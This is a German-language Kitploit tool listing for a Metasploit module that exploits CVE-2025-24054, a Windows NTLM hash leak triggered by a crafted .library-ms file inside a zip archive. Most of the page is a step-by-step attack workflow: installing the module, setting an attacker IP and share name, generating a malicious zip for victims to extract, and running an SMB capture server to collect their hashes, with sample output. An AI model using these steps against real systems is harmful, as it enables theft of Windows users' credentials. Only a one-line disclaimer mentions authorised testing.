Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24054-24071---Metasploit-Module — Metasploit-Modul zur Ausnutzung von CVE-2025-24054 (ex 24071). In Metasploit integrierter NTLM-Leak-Exploit für Angriffsvektoren, die auf Windows-Bibliotheken basieren. | Kitploit
Tools/GitHubGitHub/securitylayer404/cve-2025-24054-24071---metasploit-module
Exploit-FrameworksPayload-GenerierungExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubsecuritylayer404/cve-2025-24054-24071---metasploit-module

CVE-2025-24054-24071---Metasploit-Module

Metasploit-Modul zur Ausnutzung von CVE-2025-24054 (ex 24071). In Metasploit integrierter NTLM-Leak-Exploit für Angriffsvektoren, die auf Windows-Bibliotheken basieren.

Repository anzeigen
1vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-24054/24071 - Metasploit-Modul

Übersicht

Die Verwundbarkeit tritt während des Extraktionsprozesses einer .zip-Datei auf. Bei Interaktion mit einer speziell gestalteten .library-ms-Datei verarbeitet der Windows-Explorer das interne XML-Schema und initiiert automatisch eine SMB-Authentifizierungsanfrage an einen vom Angreifer kontrollierten entfernten Pfad.

Dieses Verhalten ermöglicht die Exfiltration des NTLM-Hashs des Benutzers, ohne dass über das Entpacken der Datei hinaus eine weitere Interaktion erforderlich ist. Für einen Proof of Concept empfehle ich den Besuch des folgenden Links: Fluffy - HTB.

⚠️ Wichtiger Hinweis:

Obwohl diese Sicherheitslücke ursprünglich als CVE-2025-24071 verbreitet wurde, wird sie derzeit offiziell als CVE-2025-24054 verfolgt.

📌 Installation

Repository klonen:

root@kitploit:~
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071

Das Modul in das Metasploit-Verzeichnis kopieren:

root@kitploit:~
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/

Falls das Verzeichnis nicht existiert, erstellen Sie es mit:

root@kitploit:~
❯ mkdir -p ~/.msf4/modules/auxiliary/server/

Anschließend das Modul erneut kopieren.

📌 Verwendung

Metasploit starten und das Modul laden:

root@kitploit:~
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak

Wenn das Modul korrekt geladen wurde, können Sie die Optionen zur Konfiguration sehen:

root@kitploit:~
❯ show options

Module options (auxiliary/server/ntlm_hash_leak):

   Name          Current Setting       Required  Description

   ----          ---------------       --------  -----------

   ATTACKER_IP                         yes       IP del atacante (donde corre Responder/Impacket)

   FILENAME      exploit.zip           yes       El nombre del archivo ZIP

   LIBRARY_NAME  documents.library-ms  yes       Nombre del archivo .library-ms

   SHARE_NAME    recurso               yes       Nombre del recurso compartido ficticio

Modul konfigurieren und ausführen:

root@kitploit:~
❯ set ATTACKER_IP 0.0.0.0  # Ersetzen Sie dies durch Ihre Angreifer-IP

❯ set FILENAME exploit.zip  # Name der Payload, die Sie auf den SMB-Server hochladen (Zielrechner)

❯ set LIBRARY_NAME malicious.library-ms  # Name der .library-ms-Datei

❯ set SHARE_NAME it_shared  # Name der SMB-Freigabe

❯ run

Ausgabe: Das Modul erzeugt eine .zip-Datei, die auf den Ziel-SMB-Server hochgeladen werden muss, damit sie später vom Opfer ausgeführt wird.

root@kitploit:~
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Archivo guardado en: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed

Verwenden Sie abschließend das SMB-Capture-Modul von Metasploit, um die NTLM-Hashes zu empfangen:

root@kitploit:~
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0  # Ersetzen Sie dies durch Ihre Angreifer-IP
❯ run

Wenn Sie Probleme beim Starten des SMB-Servers über Metasploit haben:

  • Führen Sie msfconsole als root aus
  • Stellen Sie sicher, dass die Datei ntlm_hash_leak.rb über die entsprechenden Berechtigungen verfügt, um von root zugegriffen zu werden

⚠️ Warnung

Dieses Modul wurde ausschließlich zu Bildungszwecken und für autorisierte Tests entwickelt. Die unbefugte Nutzung solcher Tools kann illegal sein.

🕷 Autor

Security Layer

Tool herunterladen